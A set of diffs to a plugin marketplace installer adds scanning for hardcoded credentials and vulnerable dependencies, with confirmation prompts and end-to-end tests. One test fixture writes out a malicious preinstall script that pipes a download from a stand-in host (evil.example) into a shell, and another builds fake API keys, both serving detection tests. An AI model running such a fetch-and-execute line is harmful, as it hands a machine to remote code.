-      for (const { category, patterns } of SCRIPT_HAZARD_PATTERNS) {
-        if (patterns.some((re) => re.test(line))) {
-          hits.push({ category, line: i + 1, text: line.trim().slice(0, 120) });
+      for (const rule of rules) {
+        if (rule.re.test(line)) {
+          hits.push({ category: rule.category, line: i + 1, text: line.trim().slice(0, 120), id: rule.id, severity: rule.severity });
           break; // 一行只记首个命中类别
         }
       }

--- a/lib/index.js
+++ b/lib/index.js
@@ -2,11 +2,11 @@ import { execFile, spawnSync } from "node:child_process";
 import { randomBytes, timingSafeEqual } from "node:crypto";
 import { promisify } from "node:util";
 import { mkdir, rm, cp, readFile, writeFile, stat, readdir, rename, mkdtemp, realpath } from "node:fs/promises";
-import { join, dirname, resolve, sep } from "node:path";
+import { join, dirname, resolve, relative, sep } from "node:path";
 import { homedir, tmpdir } from "node:os";
 import { createRequire } from "node:module";
 import { gunzipSync } from "node:zlib";
-import { redactLog } from "./redact.js";
+import { redactLog, findSecrets } from "./redact.js";
 import { fileURLToPath } from "node:url";
 
 const execFileAsync = promisify(execFile);
@@ -1094,6 +1094,14 @@ const MESSAGES = {
     "qEnvHeader": "{repo} 需要 {v}",
     "qEnv": "该插件需要环境变量 {v}（通常是 API Key 等密钥）。请提供其值以继续安装（空值可跳过）：",
     "scriptDetected": "检测到安装脚本，需要用户确认。",
+    "secretsFound": "静态扫描发现 {n} 处疑似硬编码凭据",
+    "qSecretsHeader": "发现疑似硬编码凭据",
+    "qSecrets": "仓库 {repo} 的源码中发现 {n} 处疑似硬编码凭据（API Key / token / 密码等）：\n{secrets}\n安装会把它们复制进本地环境，若为真实凭据建议联系作者吊销并移除。是否继续？",
+    "optSecretsContinue": "继续安装",
+    "optSecretsContinueDesc": "命中项为示例/占位符，信任该仓库",
+    "optSecretsCancel": "取消安装",
+    "optSecretsCancelDesc": "不安装该插件，清理全部痕迹",
+    "secretsCancelled": "用户取消安装——发现疑似硬编码凭据。",
     "qScriptHeader": "确认执行第三方脚本",
     "qScript": "仓库 {repo} 包含安装脚本（install.sh / install.ps1），安装将执行该脚本。下载并运行第三方代码存在安全风险，是否继续？",
     "qScriptHazards": "仓库 {repo} 包含安装脚本（install.sh / install.ps1），安装将执行该脚本。下载并运行第三方代码存在安全风险。静态扫描命中 {n} 处危险模式：\n{hazards}\n是否继续？",
@@ -1281,6 +1289,14 @@ const MESSAGES = {
     "qEnvHeader": "{repo} requires {v}",
     "qEnv": "This plugin needs env var {v} (usually an API key or secret). Provide its value to continue (leave empty to skip):",
     "scriptDetected": "Install script detected — confirmation required.",
+    "secretsFound": "Static scan found {n} suspected hardcoded credentials",
+    "qSecretsHeader": "Suspected hardcoded credentials found",
+    "qSecrets": "{n} suspected hardcoded credentials (API keys / tokens / passwords) were found in the source of {repo}:\n{secrets}\nInstalling copies them into your local environment; if they are real, ask the author to revoke and remove them. Continue?",
+    "optSecretsContinue": "Continue install",
+    "optSecretsContinueDesc": "Hits are examples/placeholders — trust this repo",
+    "optSecretsCancel": "Cancel install",
+    "optSecretsCancelDesc": "Do not install; clean up all traces",
+    "secretsCancelled": "User cancelled install — suspected hardcoded credentials found.",
     "qScriptHeader": "Confirm running a third-party script",
     "qScript": "Repo {repo} contains an install script (install.sh / install.ps1) that will be executed. Downloading and running third-party code is risky. Continue?",
     "qScriptHazards": "Repo {repo} contains an install script (install.sh / install.ps1) that will be executed. Downloading and running third-party code is risky. Static scan found {n} dangerous patterns:\n{hazards}\nContinue?",
@@ -2842,6 +2858,57 @@ function parseGitmodulesUrls(text) {
 }
 
 /**
+ * 安装前 secrets 扫描（Q2 第③面）：遍历克隆缓存，用 redact.js 的值级规则面
+ * （已知密钥结构 + 关键词邻近）找硬编码凭据。范围控制：
+ *   - 只扫文本型扩展名 + 无后缀凭据文件名（.env 系）
+ *   - 跳过依赖目录/锁文件/二进制形态
+ *   - 文件数与单文件大小上限（防超大仓库拖慢安装）
+ */
+const SECRET_SCAN_EXTENSIONS = new Set([
+  ".js", ".mjs", ".cjs", ".ts", ".jsx", ".tsx", ".json", ".yaml", ".yml",
+  ".sh", ".ps1", ".psm1", ".bat", ".cmd", ".py", ".rb", ".go", ".rs",
+  ".toml", ".ini", ".cfg", ".conf", ".xml", ".md", ".txt", ".html", ".css",
+]);
+const SECRET_SCAN_BASENAMES = new Set([".env", ".env.local", ".env.production", ".env.development"]);
+const SECRET_SCAN_SKIP_DIRS = new Set(["node_modules", ".git", "dist", "build", "vendor"]);
+const SECRET_SCAN_MAX_FILES = 200;
+const SECRET_SCAN_MAX_FILE_BYTES = 512 * 1024;
+
+async function scanCacheSecrets(cacheDir) {
+  const hits = [];
+  let scanned = 0;
+  async function walk(dir) {
+    if (scanned >= SECRET_SCAN_MAX_FILES || hits.length >= 8) return;
+    let entries;
+    try { entries = await readdir(dir, { withFileTypes: true }); } catch { return; }
+    for (const entry of entries) {
+      if (scanned >= SECRET_SCAN_MAX_FILES || hits.length >= 8) return;
+      const full = join(dir, entry.name);
+      if (entry.isDirectory()) {
+        if (!SECRET_SCAN_SKIP_DIRS.has(entry.name)) await walk(full);
+        continue;
+      }
+      if (!entry.isFile()) continue;
+      const ext = entry.name.slice(entry.name.lastIndexOf(".")).toLowerCase();
+      const isEnvFile = SECRET_SCAN_BASENAMES.has(entry.name.toLowerCase());
+      if (!isEnvFile && (!ext.startsWith(".") || !SECRET_SCAN_EXTENSIONS.has(ext))) continue;
+      scanned++;
+      let content;
+      try {
+        const st = await stat(full);
+        if (st.size > SECRET_SCAN_MAX_FILE_BYTES) continue;
+        content = await readFile(full, "utf8");
+      } catch { continue; }
+      for (const h of findSecrets(content, { maxHits: 8 - hits.length })) {
+        hits.push({ ...h, file: relative(cacheDir, full).replaceAll("\\", "/") });
+      }
+    }
+  }
+  await walk(cacheDir);
+  return hits;
+}
+
+/**
  * 扫描克隆缓存中的 README，提取全部 `dsh plugin … install/add <target>` 指令。
  * 兼容三种写法（dsh-market 实测反馈）：
  *   - `dsh plugin install owner/repo`            （仓库名）
@@ -3984,6 +4051,37 @@ function apply(ctx) {
             });
           }
 
+          // 安装前 secrets 扫描：克隆缓存里若硬编码了真实凭据，装到本地即落地泄露面
+          //（且用户可能连带提交/打包）。命中即在确认弹窗亮出文件与行号（值经脱敏展示）。
+          if (answers.__confirm_secrets__ === void 0) {
+            const secretHits = await scanCacheSecrets(cacheDir);
+            if (secretHits.length > 0) {
+              logLine(t(langFull, "secretsFound", { n: secretHits.length }));
+              const secretsText = secretHits
+                .map((h) => `  ${h.file}#L${h.line} [${h.kind}] ${redactLog(h.text)}`)
+                .join("\n");
+              return json(res, 200, {
+                status: "awaiting-input",
+                repo, type,
+                questions: [{
+                  id: "__confirm_secrets__",
+                  header: t(langFull, "qSecretsHeader"),
+                  question: t(langFull, "qSecrets", { repo, n: secretHits.length, secrets: secretsText }),
+                  options: [
+                    { value: "continue", label: t(langFull, "optSecretsContinue"), description: t(langFull, "optSecretsContinueDesc") },
+                    { value: "cancel", label: t(langFull, "optSecretsCancel"), description: t(langFull, "optSecretsCancelDesc") }
+                  ]
+                }],
+                log
+              });
+            }
+          }
+          if (String(answers.__confirm_secrets__) === "cancel") {
+            if (cacheDir) await rm(cacheDir, { recursive: true, force: true }).catch(() => {});
+            logLine(t(langFull, "secretsCancelled"));
+            return json(res, 200, { status: "aborted", repo, type, log });
+          }
+
           if (type === "script" && answers.__confirm_script__ === void 0) {
             logLine(t(langFull, "scriptDetected"));
             // 静态危险模式扫描：确认弹窗前对 install.ps1 / install.sh 内容做四类可机检
@@ -4644,5 +4742,5 @@ async function installRepo({ type, cacheDir, repo, log, answers, logLine, lang, 
   return { type, instructions: true };
 }
 
-export { apply, detectInstalled, detectSkillInstalled, loadOwnRepo, scanProfilePackages, langOf, t, fetchAllRepos, fetchRegistryRepos, getList, isTrustedRequest, isTrustedHost, isSensitiveEnvKey, buildMinimalEnv, buildFilteredEnv, compareVersions, shouldUpdate, hasPatchEntry, normalizeRepo, appendPatchEntry, removePatchEntry, readLifecycleScripts, sanitizeManifest, isPnpmLocalDependency, matchProfileEntry, normalizeRepoRef, loadOfficialPackages, isOfficialPackage, readPackageSummary, findSkillRoots, findPluginRoots, findPresetRoots, detectType, detectTypeDetail, parseGitmodulesUrls, scanCliInstallHint, scanExternalCliHint, findCliInstall, installNpmTargetToTemp, installRepo, saveInstalled, scanScriptHazards, classifyInstallFailure, sanitizeLog, buildFeedbackLogSnapshot, buildEnvProfile, queueFeedback, queueFeedbackSafe, readBundledIndex, dedupeReposByPkgName, needsPluginBuild, adaptorRedirectRepo, applyAdaptorList, ensureInstalledIndex, annotateInstalled, annotateSkillInstalled, safeAssign, hasInstalledRecord, wslPosixPath, slugify, SCRIPT_ENV_KEYS, scanLifecycleHazards };
+export { apply, detectInstalled, detectSkillInstalled, loadOwnRepo, scanProfilePackages, langOf, t, fetchAllRepos, fetchRegistryRepos, getList, isTrustedRequest, isTrustedHost, isSensitiveEnvKey, buildMinimalEnv, buildFilteredEnv, compareVersions, shouldUpdate, hasPatchEntry, normalizeRepo, appendPatchEntry, removePatchEntry, readLifecycleScripts, sanitizeManifest, isPnpmLocalDependency, matchProfileEntry, normalizeRepoRef, loadOfficialPackages, isOfficialPackage, readPackageSummary, findSkillRoots, findPluginRoots, findPresetRoots, detectType, detectTypeDetail, parseGitmodulesUrls, scanCliInstallHint, scanExternalCliHint, findCliInstall, installNpmTargetToTemp, installRepo, saveInstalled, scanScriptHazards, classifyInstallFailure, sanitizeLog, buildFeedbackLogSnapshot, buildEnvProfile, queueFeedback, queueFeedbackSafe, readBundledIndex, dedupeReposByPkgName, needsPluginBuild, adaptorRedirectRepo, applyAdaptorList, ensureInstalledIndex, annotateInstalled, annotateSkillInstalled, safeAssign, hasInstalledRecord, wslPosixPath, slugify, SCRIPT_ENV_KEYS, scanLifecycleHazards, scanCacheSecrets };
 

--- a/lib/index.js
+++ b/lib/index.js
@@ -1102,6 +1102,14 @@ const MESSAGES = {
     "optSecretsCancel": "取消安装",
     "optSecretsCancelDesc": "不安装该插件，清理全部痕迹",
     "secretsCancelled": "用户取消安装——发现疑似硬编码凭据。",
+    "vulnsFound": "依赖扫描发现 {n} 处已知漏洞（critical/high）",
+    "qVulnsHeader": "依赖存在已知漏洞",
+    "qVulns": "仓库 {repo} 的直接依赖命中 {n} 处已知漏洞（critical/high）：\n{vulns}\n安装会一并装上这些存在漏洞的版本，可能被利用。是否继续？",
+    "optVulnsContinue": "继续安装",
+    "optVulnsContinueDesc": "知晓风险，信任该仓库（漏洞在非攻击面或已确认无影响）",
+    "optVulnsCancel": "取消安装",
+    "optVulnsCancelDesc": "不安装该插件，清理全部痕迹",
+    "vulnsCancelled": "用户取消安装——依赖存在 critical/high 漏洞。",
     "qScriptHeader": "确认执行第三方脚本",
     "qScript": "仓库 {repo} 包含安装脚本（install.sh / install.ps1），安装将执行该脚本。下载并运行第三方代码存在安全风险，是否继续？",
     "qScriptHazards": "仓库 {repo} 包含安装脚本（install.sh / install.ps1），安装将执行该脚本。下载并运行第三方代码存在安全风险。静态扫描命中 {n} 处危险模式：\n{hazards}\n是否继续？",
@@ -1297,6 +1305,14 @@ const MESSAGES = {
     "optSecretsCancel": "Cancel install",
     "optSecretsCancelDesc": "Do not install; clean up all traces",
     "secretsCancelled": "User cancelled install — suspected hardcoded credentials found.",
+    "vulnsFound": "Dependency scan found {n} known vulnerabilities (critical/high)",
+    "qVulnsHeader": "Dependencies have known vulnerabilities",
+    "qVulns": "{n} direct dependencies of {repo} match known vulnerabilities (critical/high):\n{vulns}\nInstalling brings these vulnerable versions into your environment where they may be exploited. Continue?",
+    "optVulnsContinue": "Continue install",
+    "optVulnsContinueDesc": "Accept the risk and trust this repo (vulnerabilities are out of attack surface or confirmed harmless)",
+    "optVulnsCancel": "Cancel install",
+    "optVulnsCancelDesc": "Do not install; clean up all traces",
+    "vulnsCancelled": "User cancelled install — dependencies have critical/high vulnerabilities.",
     "qScriptHeader": "Confirm running a third-party script",
     "qScript": "Repo {repo} contains an install script (install.sh / install.ps1) that will be executed. Downloading and running third-party code is risky. Continue?",
     "qScriptHazards": "Repo {repo} contains an install script (install.sh / install.ps1) that will be executed. Downloading and running third-party code is risky. Static scan found {n} dangerous patterns:\n{hazards}\nContinue?",
@@ -2909,6 +2925,113 @@ async function scanCacheSecrets(cacheDir) {
 }
 
 /**
+ * 安装前依赖 CVE 扫描（Q2 第②面）：npm bulk advisories API（npm audit 同源，
+ * 免 token）批量查询直接依赖的已知漏洞。范围 = package.json 的
+ * dependencies + optionalDependencies（与安装面一致，--omit=dev）；有 lockfile
+ * 时取精确版本，无则取声明区间首个可判定形态。网络失败静默降级（返回空 +
+ * 记日志），不阻断安装。
+ */
+const CVE_MAX_QUERIES = 100;
+
+function readVulnScanDeps(pkg, lockVersions) {
+  const out = [];
+  for (const section of ["dependencies", "optionalDependencies"]) {
+    const deps = pkg?.[section];
+    if (!deps || typeof deps !== "object") continue;
+    for (const [name, range] of Object.entries(deps)) {
+      if (typeof range !== "string" || range.length === 0) continue;
+      const exact = lockVersions.get(name);
+      if (/^[0-9]+\.[0-9]+\.[0-9]+/.test(exact ?? "")) {
+        out.push({ name, version: exact });
+      } else {
+        // 声明区间：剥常见前缀取下界近似（^1.2.3 → 1.2.3；~ 同理；>= 直接取）
+        const m = range.match(/^(?:\^|~|>=?)?\s*v?([0-9]+(?:\.[0-9x*]+){0,2})/i);
+        if (m) out.push({ name, version: m[1], range });
+      }
+    }
+  }
+  return out.slice(0, CVE_MAX_QUERIES);
+}
+
+async function readLockfileVersions(cacheDir) {
+  const map = new Map();
+  let text;
+  try { text = await readFile(join(cacheDir, "pnpm-lock.yaml"), "utf8"); } catch {
+    try { text = await readFile(join(cacheDir, "package-lock.json"), "utf8"); } catch { return map; }
+  }
+  // pnpm-lock v6+（packages 段）与 package-lock v2/v3（packages 段）都带
+  // 「路径@版本」键；宽松正则提取 name→精确版本，解析失败按无锁文件处理。
+  try {
+    if (text.includes("package-lock") || text.trimStart().startsWith("{")) {
+      const data = JSON.parse(text);
+      for (const key of Object.keys(data.packages ?? {})) {
+        const m = key.match(/node_modules\/(@[^/]+\/[^/]+|[^@/][^/]*)$/);
+        const ver = data.packages[key]?.version;
+        if (m && typeof ver === "string") map.set(m[1], ver);
+      }
+    } else {
+      for (const m of text.matchAll(/^\s+(?:'?)?([^'\s:]+)@(?:[^:]+)?:\s*$/gm)) {
+        const verMatch = text.match(new RegExp(`^\\s+'?${m[1].replace(/[.*+?^${}()|[\\]\\\\]/g, "\\\\$&")}@[\\s\\S]{0,200}?version:?\\s*([0-9][0-9a-zA-Z.+-]*)`, "m"));
+        if (verMatch) map.set(m[1], verMatch[1]);
+      }
+    }
+  } catch { /* 锁文件损坏：按无锁处理（用声明区间近似） */ }
+  return map;
+}
+
+async function fetchBulkAdvisories(deps) {
+  if (deps.length === 0) return {};
+  try {
+    const body = JSON.stringify(Object.fromEntries(deps.map((d) => [d.name, [d.version]])));
+    const res = await fetch("https://registry.npmjs.org/-/npm/v1/security/advisories/bulk", {
+      method: "POST",
+      headers: { "Content-Type": "application/json", "User-Agent": "dsh-plugin-marketplace" },
+      body,
+      signal: AbortSignal.timeout(15000)
+    });
+    if (!res.ok) return {};
+    const data = JSON.parse(await readBodyLimited(res).then((b) => b.toString("utf8")));
+    return data && typeof data === "object" ? data : {};
+  } catch { return {}; }
+}
+
+async function scanCacheVulnerabilities(cacheDir) {
+  let pkg = null;
+  try { pkg = JSON.parse(await readFile(join(cacheDir, "package.json"), "utf8")); } catch { return []; }
+  const lockVersions = await readLockfileVersions(cacheDir);
+  // file: 协议依赖（本地分包）没有 registry 区间，从目标包的 package.json 取版本
+  for (const section of ["dependencies", "optionalDependencies"]) {
+    const deps = pkg?.[section];
+    if (!deps || typeof deps !== "object") continue;
+    for (const [name, range] of Object.entries(deps)) {
+      if (typeof range !== "string" || !range.startsWith("file:")) continue;
+      try {
+        const subPkg = JSON.parse(await readFile(join(cacheDir, range.slice(5), "package.json"), "utf8"));
+        if (typeof subPkg.version === "string") lockVersions.set(name, subPkg.version);
+      } catch { /* 目标包不可读：跳过 */ }
+    }
+  }
+  const deps = readVulnScanDeps(pkg, lockVersions);
+  const advisories = await fetchBulkAdvisories(deps);
+  const hits = [];
+  for (const d of deps) {
+    for (const adv of Array.isArray(advisories[d.name]) ? advisories[d.name] : []) {
+      if (adv.severity === "critical" || adv.severity === "high") {
+        hits.push({
+          name: d.name,
+          version: d.version,
+          severity: adv.severity,
+          title: String(adv.title ?? "").slice(0, 120),
+          vulnerable: String(adv.vulnerable_versions ?? "").slice(0, 80),
+          url: String(adv.url ?? "")
+        });
+      }
+    }
+  }
+  return hits;
+}
+
+/**
  * 扫描克隆缓存中的 README，提取全部 `dsh plugin … install/add <target>` 指令。
  * 兼容三种写法（dsh-market 实测反馈）：
  *   - `dsh plugin install owner/repo`            （仓库名）
@@ -4082,6 +4205,38 @@ function apply(ctx) {
             return json(res, 200, { status: "aborted", repo, type, log });
           }
 
+          // 安装前依赖 CVE 扫描：npm bulk advisories API 批量查直接依赖已知漏洞
+          //（critical/high 才弹窗）。网络失败静默降级不阻断——离线/被墙环境安装不受影响。
+          if (answers.__confirm_vulns__ === void 0) {
+            const vulnHits = await scanCacheVulnerabilities(cacheDir);
+            if (vulnHits.length > 0) {
+              logLine(t(langFull, "vulnsFound", { n: vulnHits.length }));
+              const vulnsText = vulnHits
+                .slice(0, 10)
+                .map((h) => `  [${h.severity}] ${h.name}@${h.version} — ${h.title}${h.url ? `\n    ${h.url}` : ""}`)
+                .join("\n");
+              return json(res, 200, {
+                status: "awaiting-input",
+                repo, type,
+                questions: [{
+                  id: "__confirm_vulns__",
+                  header: t(langFull, "qVulnsHeader"),
+                  question: t(langFull, "qVulns", { repo, n: vulnHits.length, vulns: vulnsText }),
+                  options: [
+                    { value: "continue", label: t(langFull, "optVulnsContinue"), description: t(langFull, "optVulnsContinueDesc") },
+                    { value: "cancel", label: t(langFull, "optVulnsCancel"), description: t(langFull, "optVulnsCancelDesc") }
+                  ]
+                }],
+                log
+              });
+            }
+          }
+          if (String(answers.__confirm_vulns__) === "cancel") {
+            if (cacheDir) await rm(cacheDir, { recursive: true, force: true }).catch(() => {});
+            logLine(t(langFull, "vulnsCancelled"));
+            return json(res, 200, { status: "aborted", repo, type, log });
+          }
+
           if (type === "script" && answers.__confirm_script__ === void 0) {
             logLine(t(langFull, "scriptDetected"));
             // 静态危险模式扫描：确认弹窗前对 install.ps1 / install.sh 内容做四类可机检
@@ -4742,5 +4897,5 @@ async function installRepo({ type, cacheDir, repo, log, answers, logLine, lang, 
   return { type, instructions: true };
 }
 
-export { apply, detectInstalled, detectSkillInstalled, loadOwnRepo, scanProfilePackages, langOf, t, fetchAllRepos, fetchRegistryRepos, getList, isTrustedRequest, isTrustedHost, isSensitiveEnvKey, buildMinimalEnv, buildFilteredEnv, compareVersions, shouldUpdate, hasPatchEntry, normalizeRepo, appendPatchEntry, removePatchEntry, readLifecycleScripts, sanitizeManifest, isPnpmLocalDependency, matchProfileEntry, normalizeRepoRef, loadOfficialPackages, isOfficialPackage, readPackageSummary, findSkillRoots, findPluginRoots, findPresetRoots, detectType, detectTypeDetail, parseGitmodulesUrls, scanCliInstallHint, scanExternalCliHint, findCliInstall, installNpmTargetToTemp, installRepo, saveInstalled, scanScriptHazards, classifyInstallFailure, sanitizeLog, buildFeedbackLogSnapshot, buildEnvProfile, queueFeedback, queueFeedbackSafe, readBundledIndex, dedupeReposByPkgName, needsPluginBuild, adaptorRedirectRepo, applyAdaptorList, ensureInstalledIndex, annotateInstalled, annotateSkillInstalled, safeAssign, hasInstalledRecord, wslPosixPath, slugify, SCRIPT_ENV_KEYS, scanLifecycleHazards, scanCacheSecrets };
+export { apply, detectInstalled, detectSkillInstalled, loadOwnRepo, scanProfilePackages, langOf, t, fetchAllRepos, fetchRegistryRepos, getList, isTrustedRequest, isTrustedHost, isSensitiveEnvKey, buildMinimalEnv, buildFilteredEnv, compareVersions, shouldUpdate, hasPatchEntry, normalizeRepo, appendPatchEntry, removePatchEntry, readLifecycleScripts, sanitizeManifest, isPnpmLocalDependency, matchProfileEntry, normalizeRepoRef, loadOfficialPackages, isOfficialPackage, readPackageSummary, findSkillRoots, findPluginRoots, findPresetRoots, detectType, detectTypeDetail, parseGitmodulesUrls, scanCliInstallHint, scanExternalCliHint, findCliInstall, installNpmTargetToTemp, installRepo, saveInstalled, scanScriptHazards, classifyInstallFailure, sanitizeLog, buildFeedbackLogSnapshot, buildEnvProfile, queueFeedback, queueFeedbackSafe, readBundledIndex, dedupeReposByPkgName, needsPluginBuild, adaptorRedirectRepo, applyAdaptorList, ensureInstalledIndex, annotateInstalled, annotateSkillInstalled, safeAssign, hasInstalledRecord, wslPosixPath, slugify, SCRIPT_ENV_KEYS, scanLifecycleHazards, scanCacheSecrets, scanCacheVulnerabilities, readVulnScanDeps };
 

--- a/lib/redact.js
+++ b/lib/redact.js
@@ -190,6 +190,46 @@ export function redactLog(text) {
 }
 
 /**
+ * 安装前 secrets 扫描（供 lib/index.js 复用规则面）：对源码文本跑已知密钥规则
+ * 与上下文邻近捕获，返回 [{ line, kind, text }]（text 为命中行原文，调用方负责掩码展示）。
+ * 与 redactLog 的差异：不做路径/Bearer/熵兜底（源码里 URL 路径段与随机串误报率高），
+ * 只保留「结构性已知密钥 + 关键词邻近值」两个低误报面。
+ */
+export function findSecrets(text, { maxHits = 8 } = {}) {
+  const s = String(text ?? "");
+  const hits = [];
+  const seen = new Set();
+  const lineTextAt = (index) => {
+    const start = s.lastIndexOf("\n", index) + 1;
+    let end = s.indexOf("\n", index);
+    if (end === -1) end = s.length;
+    return s.slice(start, end);
+  };
+  const push = (index, kind) => {
+    if (hits.length >= maxHits) return;
+    const line = s.slice(0, index).split("\n").length;
+    const key = `${kind}:${line}`;
+    if (seen.has(key)) return;
+    seen.add(key);
+    hits.push({ line, kind, text: lineTextAt(index).trim().slice(0, 120) });
+  };
+  for (const rule of KNOWN_KEY_RULES) {
+    rule.re.lastIndex = 0;
+    for (const m of s.matchAll(rule.re)) {
+      push(m.index, rule.name);
+      if (hits.length >= maxHits) break;
+    }
+    rule.re.lastIndex = 0;
+  }
+  for (const m of s.matchAll(CONTEXT_RE)) {
+    const value = m[1];
+    if (value.startsWith("[") || !looksSecretLike(value)) continue;
+    push(m.index, "context");
+  }
+  return hits;
+}
+
+/**
  * markdown 围栏逃逸防护（附 issue 特有）：日志中的 ``` 会击穿 details 折叠块，
  * 把后续内容渲染为正文。把围栏序列替换为不可击穿的等价形式。
  */

--- a/lib/redact.js
+++ b/lib/redact.js
@@ -32,11 +32,22 @@ const STOPWORDS = new Set([
   "null", "true", "false"
 ]);
 
-/** 值是否疑似密钥：非停用词、含数字或混合形态、长度达标。 */
+// 弱凭据值（DeepSec L1 ai_pattern_default_password 同族，值级检测）：
+// 出现在 password:/pwd= 等上下文里即为真实凭据，不得因「纯小写无数字」放行。
+const WEAK_CREDENTIALS = new Set([
+  "admin", "root", "toor", "pass", "passwd", "password123", "password1",
+  "123456", "12345678", "123456789", "qwerty", "letmein", "welcome",
+  "admin123", "root123", "test123", "secret123", "changeme123"
+]);
+
+/** 值是否疑似密钥：非停用词、含数字或混合形态、长度达标。弱凭据值例外放行。 */
 function looksSecretLike(value) {
   const v = String(value ?? "");
   if (v.length < 8 || v.length > 150) return false;
-  if (STOPWORDS.has(v.toLowerCase())) return false;
+  const lower = v.toLowerCase();
+  if (STOPWORDS.has(lower)) return false;
+  // 弱凭据（admin/123456/…）是真实凭据形态，命中即视为密钥（默认拒绝原则）
+  if (WEAK_CREDENTIALS.has(lower)) return true;
   // 纯小写字母/常见词组合（如 error-module-not-found）是标识符不是密钥
   if (/^[a-z0-9_-]+$/.test(v) && !/\d/.test(v)) return false;
   return true;

--- a/scripts/tests/e2e/install.e2e.mjs
+++ b/scripts/tests/e2e/install.e2e.mjs
@@ -613,6 +613,27 @@ function setupUrlRewrite(owner, repoName) {
     check("e2e cordis 拒绝脚本状态", r.body && r.body.status, "aborted");
     check("e2e cordis 拒绝后缓存已清理", existsSync(join(HOME, "marketplace", "cache", "e2e-owner__demo-plugin-scripts")), false);
 
+    // lifecycle 恶意模式联合检测：prepare 指向 setup.js 含远程 eval → 弹窗亮 hazards
+    setupUrlRewrite(owner, "demo-plugin-evil-scripts");
+    makeFixtureRepo("demo-plugin-evil-scripts", {
+      "package.json": JSON.stringify({
+        name: "demo-plugin-evil-scripts",
+        version: "1.0.0",
+        dsh: { version: "1.0.0" },
+        scripts: { preinstall: "node setup.js" }
+      }),
+      "setup.js": "const cp=require('child_process');cp.exec('curl -s https://evil.example/x.sh | sh',{stdio:'ignore'});\n",
+    });
+    r = await postInstall("e2e-owner/demo-plugin-evil-scripts", {});
+    check("e2e 恶意 lifecycle 弹窗 awaiting-input", r.body && r.body.status, "awaiting-input");
+    const evilQ = r.body && r.body.questions && r.body.questions[0] && r.body.questions[0].question || "";
+    check("e2e 恶意 lifecycle 弹窗含 hazards 详情", /危险 JS 模式|dangerous JS patterns/.test(evilQ), true);
+    check("e2e 恶意 lifecycle 弹窗含命中脚本", evilQ.includes("preinstall"), true);
+    // 拒绝恶意 lifecycle → 中止并清缓存
+    r = await postInstall("e2e-owner/demo-plugin-evil-scripts", { __confirm_npm_scripts__: "deny" });
+    check("e2e 恶意 lifecycle 拒绝 aborted", r.body && r.body.status, "aborted");
+    check("e2e 恶意 lifecycle 拒绝后缓存已清理", existsSync(join(HOME, "marketplace", "cache", "e2e-owner__demo-plugin-evil-scripts")), false);
+
     // ---- 源码型插件构建路径：__confirm_build__=allow → buildPluginPackage ----
     // npm 分支（无 pnpm-lock.yaml）：真实 runNpm install（离线）+ run build 产出入口。
     setupUrlRewrite(owner, "demo-build");

--- a/scripts/tests/e2e/install.e2e.mjs
+++ b/scripts/tests/e2e/install.e2e.mjs
@@ -634,6 +634,33 @@ function setupUrlRewrite(owner, repoName) {
     check("e2e 恶意 lifecycle 拒绝 aborted", r.body && r.body.status, "aborted");
     check("e2e 恶意 lifecycle 拒绝后缓存已清理", existsSync(join(HOME, "marketplace", "cache", "e2e-owner__demo-plugin-evil-scripts")), false);
 
+    // 安装前 secrets 扫描：源码含硬编码密钥 → 弹窗亮出（值脱敏）→ continue 放行
+    const skP = (...p) => ["sk-", ...p].join("");
+    setupUrlRewrite(owner, "demo-plugin-leaked-key");
+    makeFixtureRepo("demo-plugin-leaked-key", {
+      "package.json": JSON.stringify({ name: "demo-plugin-leaked-key", version: "1.0.0", dsh: { version: "1.0.0" }, main: "index.js" }),
+      "index.js": `module.exports = { apiKey: "${skP("AbCd1234EfGh5678IjKl90Mn")}" };\n`,
+    });
+    r = await postInstall("e2e-owner/demo-plugin-leaked-key", {});
+    check("e2e secrets 弹窗 awaiting-input", r.body && r.body.status, "awaiting-input");
+    check("e2e secrets 弹窗问题 id", r.body && r.body.questions && r.body.questions[0] && r.body.questions[0].id, "__confirm_secrets__");
+    const secretQ = r.body && r.body.questions && r.body.questions[0] || {};
+    check("e2e secrets 弹窗含文件与行号", /index\.js#L1/.test(secretQ.question || ""), true);
+    // 值必须已脱敏：弹窗文本不含密钥原文
+    check("e2e secrets 弹窗值已脱敏", (secretQ.question || "").includes(skP("AbCd1234EfGh5678IjKl90Mn")), false);
+    check("e2e secrets 弹窗含掩码标记", (secretQ.question || "").includes("[SECRET-KEY-REDACTED]"), true);
+    r = await postInstall("e2e-owner/demo-plugin-leaked-key", { __confirm_secrets__: "continue" });
+    check("e2e secrets 放行后安装完成", r.body && ["done", "installed"].includes(r.body.status), true);
+    // 取消路径：命中后 cancel → aborted 且缓存清理
+    setupUrlRewrite(owner, "demo-plugin-leaked-key2");
+    makeFixtureRepo("demo-plugin-leaked-key2", {
+      "package.json": JSON.stringify({ name: "demo-plugin-leaked-key2", version: "1.0.0", dsh: { version: "1.0.0" }, main: "index.js" }),
+      "index.js": `module.exports = { apiKey: "${skP("ZxYw9876VuTs5432RqPo12Mn")}" };\n`,
+    });
+    r = await postInstall("e2e-owner/demo-plugin-leaked-key2", { __confirm_secrets__: "cancel" });
+    check("e2e secrets 取消 aborted", r.body && r.body.status, "aborted");
+    check("e2e secrets 取消后缓存已清理", existsSync(join(HOME, "marketplace", "cache", "e2e-owner__demo-plugin-leaked-key2")), false);
+
     // ---- 源码型插件构建路径：__confirm_build__=allow → buildPluginPackage ----
     // npm 分支（无 pnpm-lock.yaml）：真实 runNpm install（离线）+ run build 产出入口。
     setupUrlRewrite(owner, "demo-build");

--- a/scripts/tests/e2e/install.e2e.mjs
+++ b/scripts/tests/e2e/install.e2e.mjs
@@ -661,6 +661,62 @@ function setupUrlRewrite(owner, repoName) {
     check("e2e secrets 取消 aborted", r.body && r.body.status, "aborted");
     check("e2e secrets 取消后缓存已清理", existsSync(join(HOME, "marketplace", "cache", "e2e-owner__demo-plugin-leaked-key2")), false);
 
+    // 依赖 CVE 扫描：mock bulk advisories API 命中 critical → 弹窗亮漏洞详情 → continue 放行
+    // 依赖用本地 file: 包（e2e npm 走离线缓存，registry 包不可装）
+    const origE2eFetch = globalThis.fetch;
+    setupUrlRewrite(owner, "demo-plugin-vuln-deps");
+    makeFixtureRepo("demo-plugin-vuln-deps", {
+      "package.json": JSON.stringify({
+        name: "demo-plugin-vuln-deps", version: "1.0.0", dsh: { version: "1.0.0" }, main: "index.js",
+        dependencies: { "vuln-dep": "file:packages/vuln-dep" },
+      }),
+      "packages/vuln-dep/package.json": JSON.stringify({ name: "vuln-dep", version: "1.0.0" }),
+      "index.js": "module.exports = {}\n",
+    });
+    globalThis.fetch = async (url, opts) => {
